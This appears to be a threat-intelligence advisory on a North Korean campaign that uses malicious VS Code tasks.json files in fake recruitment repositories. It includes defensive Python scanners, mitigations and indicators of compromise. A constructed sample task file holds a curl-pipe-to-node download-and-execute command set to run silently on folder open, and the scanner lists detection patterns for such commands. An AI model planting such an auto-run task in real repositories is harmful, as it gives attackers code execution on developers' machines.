
Threat Actors Expand Abuse of Microsoft Visual Studio Code

Medium
Published: Wed Jan 21 2026 (01/21/2026, 12:38:22 UTC)
Source: AlienVault OTX General

Description

North Korean threat actors have evolved their techniques in the Contagious Interview campaign and now abuse Microsoft Visual Studio Code task configuration files. The infection chain begins when a victim opens a malicious Git repository, usually presented as part of a recruitment process, in VS Code. If the victim grants the workspace trust, the task runs and executes arbitrary commands on the system. The task pulls JavaScript payloads hosted on vercel.app that implement the backdoor logic: remote code execution, system fingerprinting and persistent command-and-control communication. The backdoor collects host information and beacons to a C2 server every five seconds. Recent observations show further execution of similar payloads, indicating ongoing development of these tactics.

AI-Powered Analysis

Last updated: 01/21/2026, 23:35:43 UTC

Technical Analysis

This threat involves North Korean state-sponsored actors evolving their Contagious Interview campaign by abusing Visual Studio Code task configuration files (.vscode/tasks.json) to execute commands. The infection chain starts when a victim, typically approached through a fake recruitment process on a developer platform such as GitHub or GitLab, clones the lure repository and opens it in VS Code. The repository carries a task configured to run automatically when the folder is opened (VS Code's runOptions.runOn set to "folderOpen"). VS Code does not run such tasks in an untrusted workspace, so the chain depends on the victim accepting the Workspace Trust prompt; once trust is granted, the command embedded in the task runs with the user's privileges and no further interaction. That command retrieves JavaScript hosted on vercel.app and runs it with Node.js. The payload implements a backdoor with remote code execution, system fingerprinting and persistent command-and-control communication: it collects detailed host information and beacons to the C2 server every five seconds, giving the operator continuous control and a channel for data theft. The campaign primarily targets macOS systems. The pulse tags ATT&CK techniques T1059.007 (JavaScript) and T1059.005 (Visual Basic, tagged although the description mentions only Node.js/JavaScript), obfuscation (T1027) and T1105 (ingress tool transfer, i.e. the download of the hosted payload; it is not a persistence technique). Indicators are seven SHA-256 hashes, one IP address (87.236.177.9) and one domain (srv37746.hosted-by-eurohoster.org); vercel.app is a legitimate hosting platform and is not an indicator on its own. No CVE is involved: the technique abuses a documented VS Code feature combined with social engineering rather than a software flaw, which is why no exploit is "in the wild" in the usual sense. The sophistication and persistence of the campaign nonetheless indicate a medium-level threat with potential for escalation.
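The folder-open trigger described above is what a defender should look for before trusting a repository. The scanner below is an added example written for this page, not code from Jamf or the pulse author. It assumes the repository is already cloned locally, parses VS Code's JSONC task files (comments and trailing commas are legal there, so plain json.loads fails on real files), and flags tasks that auto-run on folder open or whose command matches a short, illustrative set of download-and-execute patterns. The two task files embedded at the bottom are constructed for the example and are not artefacts from the campaign.

```python
"""Scan a checked-out repository for VS Code tasks that auto-run on folder open.

Added example for this write-up, not code from Jamf or the pulse author.
Assumptions: the lure repository is already on disk, task files use VS Code's
JSONC syntax, and SUSPICIOUS_PATTERNS is illustrative rather than exhaustive.
"""
import json
import re
from pathlib import Path

# Things a build task has little reason to do, let alone one that runs itself on open.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bnode\s+-e\b", r"\beval\b", r"\bbase64\b",
    r"\|\s*(sh|bash|zsh|node)\b", r"\bosascript\b", r"\bnohup\b", r"vercel\.app",
]


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals, then trailing commas.

    Comments are removed with a string-aware scan so "https://..." survives.
    The trailing-comma pass is a regex, so a comma directly before } or ] inside
    a string literal would also be dropped; acceptable for task files.
    """
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # copy escaped char verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):       # line comment: skip to newline
            j = text.find("\n", i)
            i = n if j < 0 else j
            continue
        elif text.startswith("/*", i):       # block comment: skip past */
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
            continue
        else:
            out.append(c)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def task_command(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("osx") or {}, task.get("linux") or {}, task.get("windows") or {}):
        cmd = scope.get("command")
        if cmd:
            parts.append(cmd if isinstance(cmd, str) else json.dumps(cmd))
        for arg in scope.get("args") or []:
            parts.append(arg if isinstance(arg, str) else json.dumps(arg))
    return " ".join(parts)


def analyse_tasks_json(text: str) -> list:
    """One finding per task that auto-runs on folder open or matches an indicator."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        cmd = task_command(task)
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if auto_run or hits:
            findings.append({
                "label": task.get("label", "<unnamed>"),
                "auto_run": auto_run,
                "command": cmd,
                "indicators": hits,
                # auto-run plus download-and-execute is the shape described in the write-up
                "severity": "high" if auto_run and hits else "medium",
            })
    return findings


def scan_repo(root) -> list:
    """Analyse every .vscode/tasks.json below root; parse errors are reported, not hidden."""
    results = []
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            for f in analyse_tasks_json(path.read_text(encoding="utf-8", errors="replace")):
                results.append({"file": str(path), **f})
        except ValueError as exc:
            results.append({"file": str(path), "label": "<parse error>", "error": str(exc)})
    return results


# Constructed sample, not a real artefact: the shape of a lure repository's task file.
MALICIOUS_SAMPLE = r'''{
  // JSONC: comments are legal in VS Code task files
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "curl -s https://not-a-real-lure.vercel.app/update.js | node",
      "runOptions": { "runOn": "folderOpen" },   // fires as soon as the folder is trusted
      "presentation": { "reveal": "silent" },
    },
  ]
}'''

# Constructed benign file for comparison: an ordinary npm task with no auto-run.
BENIGN_SAMPLE = '{ "version": "2.0.0", "tasks": [ { "label": "test", "type": "npm", "script": "test" } ] }'
```

Run scan_repo on the clone directory before opening it in VS Code; a "high" finding means a task will both start by itself and reach out to the network, which is the combination to refuse trust on. The presentation.reveal: "silent" setting in the constructed sample is worth noting in reviews too, since it keeps the task's terminal output out of sight.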

Potential Impact

For European organizations, especially those involved in software development, recruitment and technology, this threat poses significant risk. A trusted task file yields unauthenticated remote code execution on the developer's workstation, and the backdoor gives the attacker persistent access from there. Confidentiality suffers first: developer hosts hold source code, intellectual property and personal data, and usually also SSH keys, cloud credentials and package-registry tokens that extend the compromise beyond the endpoint. Integrity is at risk because an attacker with control of a development environment can modify or inject code into projects and build pipelines. Availability could be affected if destructive payloads are deployed or operations disrupted. Because the lure uses legitimate developer tools and platforms such as GitHub and GitLab, the social engineering is more likely to succeed, particularly in organizations with remote or hybrid workforces that routinely exchange repositories with outside parties. The five-second C2 beacon supports ongoing espionage and lateral movement within the network. Organizations with macOS endpoints and a heavy reliance on VS Code are the most exposed, and the recruitment disguise means HR staff who handle candidate material are part of the attack surface alongside developers.

Mitigation Recommendations

1. Keep VS Code Workspace Trust enabled (security.workspace.trust.enabled) and treat the trust prompt as a security decision: a repository received as part of a recruitment process should be opened in Restricted Mode, or not at all, until its .vscode/ contents have been reviewed. Setting task.allowAutomaticTasks to "off" removes the folder-open trigger entirely, and both settings can be pushed through managed user settings.
2. Educate developers, and the HR and recruiting staff who forward candidate material, about unsolicited repositories tied to job offers or coding tests.
3. Deploy endpoint detection and response (EDR) that monitors process lineage. The observable pattern here is VS Code spawning a shell that runs curl, node or osascript, and Node.js executing script fetched over the network; both should alert on developer workstations.
4. Hunt for beaconing: connections from a developer host that repeat at a fixed five-second cadence are machine-driven. Alert on the listed IP (87.236.177.9) and domain. vercel.app is a legitimate hosting platform, so treat traffic to it as context for a periodicity or process-lineage alert rather than blocking the platform outright.
5. Use application allowlisting to restrict execution of unauthorized scripts and binaries.
6. Regularly audit and restrict permissions on developer tools and repositories to minimize exposure.
7. Integrate threat intelligence feeds to detect the published indicators of compromise (the hashes, IP and domain listed below).
8. Enforce multi-factor authentication and least privilege for access to development and recruitment platforms, and rotate any credential (SSH keys, cloud and package-registry tokens) stored on a host that ran a suspicious task.
9. Maintain up-to-date backups and incident response plans tailored to supply chain and developer toolchain attacks.
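Item 4 above asks for beaconing detection. The following is an added example, not code from Jamf or the pulse, showing that check in Python over a constructed connection log: it groups connections by source, destination and port, computes inter-arrival intervals, and flags flows whose intervals are tightly clustered, which is what a five-second check-in looks like whatever domain or IP it uses. The log format (epoch timestamp, source, destination, port), the minimum connection count and the jitter threshold are assumptions for the example; the destination IP in the sample rows is the one listed in the IOCs, used only as constructed test data.

```python
"""Flag fixed-interval beaconing in a connection log.

Added example, not from Jamf or the pulse. Assumes whitespace-separated lines
of the form "<epoch_ts> <src_ip> <dst_ip> <dst_port>"; thresholds are illustrative.
"""
from collections import defaultdict
from statistics import median, pstdev


def parse_conn_lines(lines):
    """Group connection timestamps by (src, dst, port); '#' lines are headers."""
    flows = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port = line.split()[:4]
        flows[(src, dst, int(port))].append(float(ts))
    return flows


def beacon_score(timestamps, min_count=6):
    """Return (median_interval, jitter_ratio) or None when there are too few connections.

    jitter_ratio is the population standard deviation of the inter-arrival
    times divided by their median; a scheduled timer gives a value near zero.
    """
    ts = sorted(timestamps)
    if len(ts) < min_count:
        return None
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    med = median(deltas)
    if med <= 0:
        return None
    return med, pstdev(deltas) / med


def find_beacons(lines, max_jitter=0.2, min_count=6):
    """Return flows whose timing is regular enough to look machine-driven."""
    out = []
    for (src, dst, port), ts in parse_conn_lines(lines).items():
        score = beacon_score(ts, min_count)
        if score and score[1] <= max_jitter:
            out.append({"src": src, "dst": dst, "port": port, "connections": len(ts),
                        "interval_s": round(score[0], 2), "jitter": round(score[1], 3)})
    return sorted(out, key=lambda f: f["jitter"])


# Constructed sample log: one host checking in every ~5 s (the cadence reported
# for this backdoor) and one host browsing at irregular, human-driven intervals.
SAMPLE_LOG = """
# ts src dst dport
1700000000.00 10.0.0.5 87.236.177.9 443
1700000005.02 10.0.0.5 87.236.177.9 443
1700000010.01 10.0.0.5 87.236.177.9 443
1700000014.98 10.0.0.5 87.236.177.9 443
1700000020.03 10.0.0.5 87.236.177.9 443
1700000025.00 10.0.0.5 87.236.177.9 443
1700000029.99 10.0.0.5 87.236.177.9 443
1700000000.00 10.0.0.7 203.0.113.10 443
1700000003.10 10.0.0.7 203.0.113.10 443
1700000040.50 10.0.0.7 203.0.113.10 443
1700000041.20 10.0.0.7 203.0.113.10 443
1700000095.00 10.0.0.7 203.0.113.10 443
1700000130.70 10.0.0.7 203.0.113.10 443
1700000131.00 10.0.0.7 203.0.113.10 443
""".strip().splitlines()

if __name__ == "__main__":
    for flow in find_beacons(SAMPLE_LOG):
        print(flow)
```

The check is intentionally indicator-agnostic: a payload that moves from vercel.app to another host keeps the same timer, so the periodicity still fires. Tune min_count to the time window you query (a five-second beacon produces 720 connections an hour) and raise max_jitter only if the implant is known to randomize its sleep.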


Technical Details

Author: AlienVault
TLP: white
References: https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code
Adversary: North Korea (DPRK)
Pulse Id: 6970c8be406455823a3d9652
Threat Score: null

Indicators of Compromise

Hashes (SHA-256):
1b26f73fa88f8c3b17adf6db12ec674481db1f92eb04806815b8fbd6086f07ef
67c05c1624a227959728e960e4563435db2519a24a46e95207a42ea8d4307e2d
71d8a974548e4e152e2c818d1febb7862632c1f9bff6adaa731bbaf6b23bd4b9
71e4ea17c871b983a2cbbea7a4fbd7fe498951c8fe4a1e17377e9aa06fd7184a
932a67816b10a34d05a2621836cdf7fbf0628bbfdf66ae605c5f23455de1e0bc
a2194390105731ce33cb9a51011c42a39a440942e907099f072916a36f17ef4b
f8ae6ae9d6a13a8dddb05975930161601b5cfdd0cec30b7efdc5ba0606774998

IP address:
87.236.177.9

Domain:
srv37746.hosted-by-eurohoster.org

Threat ID: 69715f574623b1157cf35e46

Added to database: 1/21/2026, 11:20:55 PM

Last enriched: 1/21/2026, 11:35:43 PM

Last updated: 1/24/2026, 2:12:46 PM

Views: 69
